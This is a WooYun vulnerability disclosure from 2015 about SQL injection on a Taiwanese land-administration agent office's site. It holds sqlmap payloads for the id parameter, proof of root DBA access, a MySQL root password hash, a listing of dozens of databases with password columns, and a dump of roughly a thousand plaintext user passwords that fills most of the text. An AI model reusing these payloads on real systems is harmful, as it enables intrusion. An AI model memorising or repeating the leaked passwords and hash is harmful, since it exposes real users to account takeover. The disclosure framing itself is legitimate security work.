漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0158888
漏洞标题:東威地政士代書事務所主站存在SQL注射漏洞(DBA权限+root密码+大量用户密码)(臺灣地區)
相关厂商:東威地政士代書事務所
漏洞作者: 路人甲
提交时间:2015-12-07 15:21
修复时间:2016-01-23 15:16
公开时间:2016-01-23 15:16
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-10: 厂商已经确认,细节仅向厂商公开
2015-12-20: 细节向核心白帽子及相关领域专家公开
2015-12-30: 细节向普通白帽子公开
2016-01-09: 细节向实习白帽子公开
2016-01-23: 细节向公众公开
简要描述:
東威地政士代書事務所主站存在SQL注射漏洞(DBA权限+root密码+大量用户密码)
详细说明:
地址:http://**.**.**.**/faq_detail.html?id=18
漏洞证明:
<code>---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=18 AND 2676=2676
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=18 AND (SELECT 5741 FROM(SELECT COUNT(*),CONCAT(0x717a6b7171,(SELECT (ELT(5741=5741,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: Linux CentOS
web application technology: PHP 5.2.10, Apache 2.2.8
back-end DBMS: MySQL 5.0
current user: 'root@localhost'
current user is DBA: True
database management system users [6]:
[*] ''@'localhost'
[*] ''@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'**.**.**.**'
database management system users password hashes:
[*] root [2]:
password hash: 77415a8540b5dece
password hash: NULL
Database: ace2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| acework | 35 |
| inquire_data | 5 |
| application | 2 |
| inquire | 2 |
| banner | 1 |
| banner_index | 1 |
| button | 1 |
| catebg | 1 |
| cbg | 1 |
| ckey | 1 |
| company | 1 |
| copyright | 1 |
| csstxt | 1 |
| device | 1 |
| fbg | 1 |
| ikey | 1 |
| keywords | 1 |
| mail | 1 |
| mbutton | 1 |
+---------------------------------------+---------+
Database: 7way
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| serv_img | 81 |
| serv | 15 |
| member | 6 |
| serv_kind | 5 |
| banner | 2 |
| device | 2 |
| application | 1 |
| company | 1 |
| copyright | 1 |
| keywords | 1 |
| mail | 1 |
| msn1 | 1 |
| news | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 67906 |
| STATISTICS | 9189 |
| TABLES | 7345 |
| KEY_COLUMN_USAGE | 5077 |
| TABLE_CONSTRAINTS | 4752 |
| SCHEMATA | 167 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| USER_PRIVILEGES | 102 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 28 |
+---------------------------------------+---------+
Database: ace
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| serv_img | 1064 |
| serv | 38 |
| acework | 35 |
| inquire_data | 5 |
| member | 4 |
| serv_kind | 3 |
| application | 2 |
| inquire | 2 |
| news | 2 |
| banner | 1 |
| banner_index | 1 |
| button | 1 |
| catebg | 1 |
| cbg | 1 |
| ckey | 1 |
| company | 1 |
| copyright | 1 |
| csstxt | 1 |
| device | 1 |
| fbg | 1 |
| ikey | 1 |
| keywords | 1 |
| mail | 1 |
| mbutton | 1 |
| mcatebg | 1 |
| mcbg | 1 |
| mfbg | 1 |
| mkey | 1 |
| mpgbg | 1 |
| msn1 | 1 |
| mtfnav | 1 |
| mtitlebg | 1 |
| mtopbg | 1 |
| nkey | 1 |
| pgbg | 1 |
| pkey | 1 |
| skey | 1 |
| special | 1 |
| supplier | 1 |
| tfnav | 1 |
| titlebg | 1 |
| topbg | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: lotto
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: jason
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: icomic
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: icomic
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: ezshop
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: ilogin
Table: serv
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: ilogin
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: kuga
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: kuga
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: kuga
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: kuga
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: kuga
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: house1688
Table: usermember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: house1688
Table: cmember
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: house1688
Table: memberuclink
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: spa
Table: memberuclink
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: spa
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: spa
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: spa
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: spa
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: spa
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: spa
Table: cmember
[1 column]
+--------+--------------+
| Column | Type |
+--------+--------------+
| passwd | varchar(255) |
+--------+--------------+
Database: preprint
Table: user
[1 column]
+---------------+--------------+
| Column | Type |
+---------------+--------------+
| user_password | varchar(255) |
+---------------+--------------+
Database: camping
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: ido
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: ido
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: epbbs
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: epbbs
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epbbs
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: epbbs
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epbbs
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: sky
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: web544_u1
Table: web_users
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(50) |
+----------+-------------+
Database: web544_u1
Table: web_admin
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: adweb
Table: m_member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: newshulin
Table: userinfo
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: osdog
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: turbo
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: imobi
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: imobi
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: love
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: love
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: epromo
Table: serv
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: epromo
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: eptest
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: jjdata
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: jjdata
Table: banker_account
[1 column]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| user_passwd | varchar(50) |
+-------------+-------------+
Database: work
Table: sys_user
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: ucenter
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: jumping
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: cjhotel
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: ecshop
Table: ecs_users
[3 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| passwd_answer | varchar(255) |
| passwd_question | varchar(50) |
| password | varchar(32) |
+-----------------+--------------+
Database: ecshop
Table: ecs_virtual_card
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| card_password | varchar(60) |
+---------------+-------------+
Database: ecshop
Table: ecs_admin_user
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: post
Table: xg_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: iweb9
Table: m_member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: i3fresh
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: i3fresh
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: hongpin
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: kss
Table: members
[1 column]
+-----------------+-------------+
| Column | Type |
+-----------------+-------------+
| member_password | varchar(50) |
+-----------------+-------------+
Database: fhk
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: fhk
Table: user
[1 column]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| us_password | varchar(255) |
+-------------+--------------+
Database: wasong
Table: job_member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| pass | varchar(10) |
+--------+-------------+
Database: lucky5
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: n239
Table: member_account
[1 column]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| user_password | varchar(50) |
+---------------+-------------+
Database: n239
Table: banker_account
[1 column]
+-------------+-------------+
| Column | Type |
+-------------+-------------+
| user_passwd | varchar(50) |
+-------------+-------------+
Database: icars
Table: member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: icars
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: km
Table: yogaclass_member
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: km
Table: yogaclass_account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: epdiscuz
Table: pre_home_blog
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(10) |
+----------+----------+
Database: epdiscuz
Table: pre_home_album
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(10) |
+----------+-------------+
Database: epdiscuz
Table: pre_common_member
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epdiscuz
Table: pre_ucenter_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epdiscuz
Table: uc_members
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | char(32) |
+----------+----------+
Database: epdiscuz
Table: pre_forum_forumfield
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(12) |
+----------+-------------+
Database: gobalb2b
Table: serv
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(30) |
+----------+-------------+
Database: gobalb2b
Table: cmember
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: ieshop
Table: ecm_member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: yuanguan
Table: member
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(20) |
+----------+-------------+
Database: crm
Table: customer
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: crm
Table: account
[1 column]
+--------+-------------+
| Column | Type |
+--------+-------------+
| passwd | varchar(20) |
+--------+-------------+
Database: lotto
Table: member
[10 entries]
+--------------+
| password |
+--------------+
| 00009999 |
| 00009999 |
| 00009999 |
| 00009999 |
| 0928684468 |
| 62906290 |
| 661127621130 |
| l450822 |
| li41zse |
| m013288 |
+--------------+
Database: jason
Table: member
[1051 entries]
+-----------------------------+
| password |
+-----------------------------+
| !QAZ2WSX |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 0000 |
| 000000 |
| 00009999 |
| 00009999 |
| 00009999 |
| 000827 |
| 00874 |
| 01100110 |
| 0123456 |
| 0203bb |
| 0222826576 |
| 0224 |
| 0311 |
| 03240324 |
| 035871217 |
| 037475213 |
| 0420 |
| 0422783515 |
| 0422932017 |
| 0424 |
| 047701871 |
| 047760753 |
| 048903 |
| 0492925315 |
| 0492925315 |
| 052356692 |
| 05910000 |
| 062302538 |
| 062462610 |
| 062736768 |
| 0673 |
| 07171466 |
| 07260627 |
| 075210 |
| 076978255 |
| 078151387 |
| 0810 |
| 0829 |
| 08388505 |
| 0910083428 |
| 0910100088 |
| 0910168966 |
| 0911727126 |
| 0912681648 |
| 0915065657 |
| 0918924591 |
| 0919 |
| 0919027586 |
| 0921180153 |
| 0921991162 |
| 0923675399 |
| 0928191562 |
| 0928298321 |
| 0929399828 |
| 0930987263 |
| 0931535792 |
| 0931947287 |
| 0932095798 |
| 0932695822 |
| 0933154119 |
| 0933913398 |
| 0933995029 |
| 0935049410 |
| 0935101305 |
| 0935333232 |
| 0936838808 |
| 0939061620 |
| 0939346061 |
| 09430943 |
| 0952452016 |
| 09531206 |
| 0955372798 |
| 0956097771 |
| 0961058162 |
| 0961080882 |
| 0963683052 |
| 0966515689 |
| 0973305982 |
| 0973958385 |
| 0977223240 |
| 0989186333 |
| 1000503 |
| 10061006 |
| 102025 |
| 11023989 |
| 1111222233334444 |
| 112227 |
| 11250 |
| 11610339 |
| 120275337 |
| 120682312 |
| 122806 |
| 123'myosin |
| 1234 |
| 1234 |
| 1234 |
| 1234 |
| 1234 |
| 1234 |
| 1234 |
| 1234 |
| 1234 |
| 1234 |
| 12345 |
| 12345 |
| 1234567 |
| 1234wu |
| 123rozznn |
| 126012 |
| 12721257 |
| 128798 |
| 130130 |
| 132642 |
| 134679 |
| 13572468a |
| 136886 |
| 139139139 |
| 1433fy |
| 1436075588 |
| 147147 |
| 162222162222 |
| 1660201 |
| 168888 |
| 190394c |
| 19651022 |
| 196877 |
| 19710209 |
| 19760425ano |
| 1989ab26 |
| 19970268 |
| 1q2w3e4r |
| 1qaz2wsx |
| 1qaz2wsx |
| 2009JM |
| 205007 |
| 205168 |
| 208080 |
| 210733 |
| 221000 |
| 22127040 |
| 221510600 |
| 22289008 |
| 225566aok |
| 2261600 |
| 22703657 |
| 22823865 |
| 22867677 |
| 22932403 |
| 2294135 |
| 231205181234 |
| 23143310 |
| 2324882 |
| 246319 |
| 25153023 |
| 256862 |
| 2580aa |
| 26008103 |
| 260251 |
| 2602526025 |
| 26335833 |
| 26425228 |
| 26831651 |
| 2710335 |
| 2728 |
| 27504043 |
| 27988026 |
| 284ao3sm3 |
| 28817768 |
| 29121429 |
| 29570006 |
| 29980909 |
| 2axiurll |
| 2idialul |
| 2jiixjli |
| 2l45k7fm4n3 |
| 2uduuxjr |
| 30042 |
| 301good |
| 3125143 |
| 31740 |
| 322916 |
| 3251DJ |
| 328711 |
| 330548 |
| 331528 |
| 3330 |
| 3355262 |
| 3398gn |
| 351185 |
| 361178 |
| 363894ab |
| 3660305 |
| 3719521 |
| 3785422 |
| 3795955 |
| 3812740 |
| 383370 |
| 384238 |
| 3edcvgy7 |
| 4099 |
| 410121 |
| 4131041 |
| 413141 |
| 4226173 |
| 43099 |
| 434friend |
| 4395 |
| 451210 |
| 4555wu |
| 4568 |
| 4597934123 |
| 461021 |
| 471120 |
| 480408 |
| 490103 |
| 49163827 |
| 4929269255 |
| 500488HSU |
| 5016 |
| 50688888 |
| 51013289 |
| 510317 |
| 511230 |
| 5168 |
| 520307 |
| 5209059108 |
| 5210017 |
| 540000 |
| 541708 |
| 54231102 |
| 546812 |
| 551018 |
| 55555555 |
| 570815 |
| 5722 |
| 572515 |
| 572715 |
| 581126 |
| 581206 |
| 581216 |
| 58245824 |
| 585488 |
| 58615861 |
| 590829 |
| 5b6n7m8 |
| 5h1662 |
| 600302KC |
| 600327 |
| 6006932 |
| 601207 |
| 601zc819 |
| 6205 |
| 620731 |
| 621102 |
| 641108 |
| 641213 |
| 65010 |
| 6542 |
| 660115 |
| 660226 |
| 6636 |
| 6638 |
| 666888 |
| 66902947 |
| 669988 |
| 680829 |
| 6810300 |
| 68903105 |
| 6931002 |
| 6997nj |
| 7089 |
| 71307130 |
| 7145 |
| 7152 |
| 71@iixaduu |
| 7220coco |
| 7266703 |
| 7345aa |
| 74068ii |
| 741227 |
| 7417073 |
| 7529 |
| 7878137 |
| 7878778 |
| 7892163 |
| 797797 |
| 820707 |
| 8223983 |
| 8224 |
| 82a0813 |
| 8371907 |
| 861009 |
| 861116 |
| 8689 |
| 8772 |
| 881777 |
| 888888 |
| 88top |
| 890224 |
| 89315252 |
| 8janus28 |
| 9025 |
| 913845 |
| 92215103 |
| 9263999 |
| 941110a |
| 95175300 |
| 96321478 |
| 963741 |
| 9658508 |
| 9688hg |
| 971018 |
| 97216619 |
| 9775627 |
| 990607 |
| 991019 |
| 991428 |
| a079021746 |
| a082600 |
| a0925370121 |
| a098221 |
| a123456a |
| a12524bc |
| a158617 |
| a1b2c3 |
| a202020 |
| a2332z |
| a26362838 |
| a2ilioioi |
| a300225 |
| a332855 |
| a3630106 |
| a390720 |
| a391005 |
| a411001x |
| a503629 |
| a580629 |
| A621498Z |
| a6889z |
| a7224212 |
| A7228723 |
| a772882 |
| a7b8c9 |
| a8007b |
| a921106 |
| a930722 |
| aa0099 |
| aa0308 |
| aa11060728 |
| aa1122 |
| AA119948 |
| aa168999 |
| aa555aa555 |
| aa869027 |
| aa89218131 |
| aaa-54088 |
| aabbccddee |
| AB495008 |
| abc001 |
| abc003 |
| abc004 |
| abc005 |
| abc006 |
| abc007 |
| abc008 |
| abc009 |
| abc011 |
| abc012 |
| abc014 |
| abc015 |
| abc016 |
| abc017 |
| abc019 |
| abc020 |
| abc021 |
| abc022 |
| abc023 |
| abc024 |
| abc025 |
| abc026 |
| abc027 |
| abc028 |
| abc029 |
| abc030 |
| abc031 |
| abc032 |
| abc033 |
| abc035 |
| abc036 |
| abc037 |
| abc038 |
| abc039 |
| abc040 |
| abc041 |
| abc042 |
| abc044 |
| abc045 |
| abc046 |
| abc047 |
| abc049 |
| abc050 |
| abc051 |
| abc052 |
| abc053 |
| abc055 |
| abc057 |
| abc058 |
| abc059 |
| abc060 |
| abc061 |
| abc063 |
| abc064 |
| abc065 |
| abc067 |
| abc068 |
| abc069 |
| abc070 |
| abc071 |
| abc072 |
| abc073 |
| abc074 |
| abc075 |
| abc076 |
| abc078 |
| abc079 |
| abc080 |
| abc082 |
| abc083 |
| abc084 |
| abc085 |
| abc086 |
| abc087 |
| abc088 |
| abc089 |
| abc090 |
| abc091 |
| abc093 |
| abc094 |
| abc095 |
| abc096 |
| abc097 |
| abc098 |
| abc099 |
| abc100 |
| abc101 |
| abc102 |
| abc103 |
| abc104 |
| abc105 |
| abc106 |
| abc107 |
| abc108 |
| abc109 |
| abc110 |
| abc111 |
| abc112 |
| abc113 |
| abc114 |
| abc115 |
| abc116 |
| abc117 |
| abc118 |
| abc120 |
| abc121 |
| abc122 |
| abc123 |
| abc124 |
| abc125 |
| abc127 |
| abc128 |
| abc129 |
| abc130 |
| abc131 |
| abc132 |
| abc133 |
| abc134 |
| abc135 |
| abc136 |
| abc137 |
| abc138 |
| abc139 |
| abc140 |
| abc141 |
| abc142 |
| abc143 |
| abc144 |
| abc146 |
| abc147 |
| abc148 |
| abc149 |
| abc150 |
| abc151 |
| abc152 |
| abc153 |
| abc156 |
| abc157 |
| abc158 |
| abc159 |
| abc160 |
| abc161 |
| abc162 |
| abc163 |
| abc164 |
| abc165 |
| abc166 |
| abc167 |
| abc168 |
| abc169 |
| abc170 |
| abc171 |
| abc172 |
| abc173 |
| abc174 |
| abc175 |
| abc176 |
| abc177 |
| abc178 |
| abc179 |
| abc180 |
| abc181 |
| abc182 |
| abc184 |
| abc185 |
| abc591106 |
| abcd0315 |
| abcd0527 |
| abcd129 |
| abcde |
| adas9338 |
| ai7089 |
| aj551222 |
| alice0940 |
| ALL873 |
| allen312 |
| amei2110$ |
| an1952 |
| andrew1822 |
| andy93652 |
| angel560321 |
| Angela |
| Anita0932047792 |
| AP0839 |
| apple2bkc |
| as19711102 |
| as25822 |
| as3388 |
| as49965 |
| asd123 |
| asd57896 |
| asdf147258369 |
| az499 |
| azabc222 |
| b120460442 |
| B1411412 |
| b19590107b |
| b6048399 |
| b621102 |
| b699095 |
| bb391919 |
| BEAR19750226 |
| BeHealth |
| bens821203 |
| BETTY0402 |
| bfx8315 |
| bg197212 |
| bluezoon |
| bmw2617 |
| bmw8356 |
| C641814 |
| c651215 |
| cat85312191 |
| cc00131313 |
| cc0428 |
| cc491491 |
| cd2679 |
| cdno2679 |
| ce8863 |
| ch64un1020 |
| chang0310 |
| chang0310 |
| chaning |
| chch1217 |
| chen777999 |
| chh0725 |
| chinsr5688 |
| chiujuou |
| chou71 |
| cj123456 |
| cj23757065 |
| ck29324023 |
| ck6286zj |
| ck9122 |
| cl1234 |
| claire214 |
| cmh7633 |
| CN20631 |
| co6121 |
| coco313 |
| cow587 |
| cpl1201 |
| ctc5551979 |
| ctsa1228 |
| dengke999 |
| dezmzkvm |
| di6367 |
| do0320 |
| dv022409 |
| e20148776803 |
| e22049 |
| e58237 |
| e6210289 |
| E7625876 |
| e956p757 |
| edwd8317@j |
| ee0819 |
| ee58 |
| ee6998 |
| eric1313 |
| es0606172 |
| esu0423 |
| f0185 |
| f09051010 |
| f122342076 |
| f223676577 |
| f5809230 |
| f797788 |
| ferrari |
| ff6578 |
| fm120967534 |
| forrest |
| fortran95 |
| frqby9oc |
| fsy0418 |
| fw2986 |
| gg760623 |
| ggyy543 |
| godlovejw |
| godlovejw |
| GOOD5899 |
| goodmany888 |
| green073 |
| gs622075 |
| h123456 |
| h22373718 |
| h8973061 |
| HAPPY123 |
| hc00189 |
| healthy99 |
| hello000 |
| hhlin.0535 |
| hi799500 |
| hiajgn |
| hj5178 |
| hj666* |
| hk47272636 |
| hl781114 |
| holland55 |
| home8235 |
| hou12345 |
| hsin1235 |
| hsu0498 |
| hu320010 |
| hu383838 |
| hu886116 |
| hung9866 |
| hyd31789 |
| hz8892 |
| i35WWW |
| imagine |
| iris0814 |
| iw9090 |
| iz19631007 |
| j3585 |
| j470402 |
| j5937148 |
| j631116 |
| j79084 |
| james1980 |
| janesha666 |
| jas951753 |
| jason2350 |
| jason561111 |
| jason561111 |
| jeging0228 |
| jerry0430 |
| jh8153 |
| jinhong258 |
| jj7777 |
| jml3787 |
| jordan23 |
| ju9152 |
| judy450812 |
| jukong668 |
| jw631110 |
| jw631110 |
| jwd5959 |
| k2l39j |
| k882103 |
| k990607 |
| kahayi730427 |
| karen5679 |
| kathrin48 |
| kathy0327 |
| kathy1976 |
| kemy0102 |
| kevinnet |
| kin1533 |
| kk0505 |
| kk0820 |
| kk1010 |
| kkpower |
| kose888 |
| krednhp83 |
| ku3077 |
| kuo123 |
| kuo1558 |
| kuoegg0627 |
| kurama2814 |
| l0963255522 |
| l38000 |
| l56785678 |
| l570712 |
| lai4168 |
| ldu13850 |
| LEE12345 |
| lee45lee |
| leo6666 |
| lhjas7 |
| liang88 |
| liaw0505 |
| lin |
| lin5011 |
| lin888999 |
| linboby |
| lisa0720 |
| lish827$ |
| live |
| lk571009 |
| lkk9234 |
| ll890202 |
| lll1205 |
| lmc5320 |
| lovecong |
| lovefriday |
| ls1974 |
| m0912631007 |
| m2887125 |
| maackia |
| mark001 |
| max346 |
| MAXIMIZE555 |
| maxipimee |
| mayli3270768 |
| may_1316 |
| me1414 |
| meiti1226 |
| mhtsai2004 |
| migatina918 |
| miky0621 |
| min6806180 |
| ming19651103 |
| miss153 |
| mkmkmkmk |
| ml123456 |
| mlpd2070 |
| mm14913 |
| moo940ht5801 |
| moon676869 |
| MPAQX31982 |
| mse49432201 |
| n121499830 |
| neili923 |
| nelson159 |
| neobos18 |
| new12345 |
| ni2319760 |
| nini8888 |
| NJBWJ36098 |
| ntnl3914 |
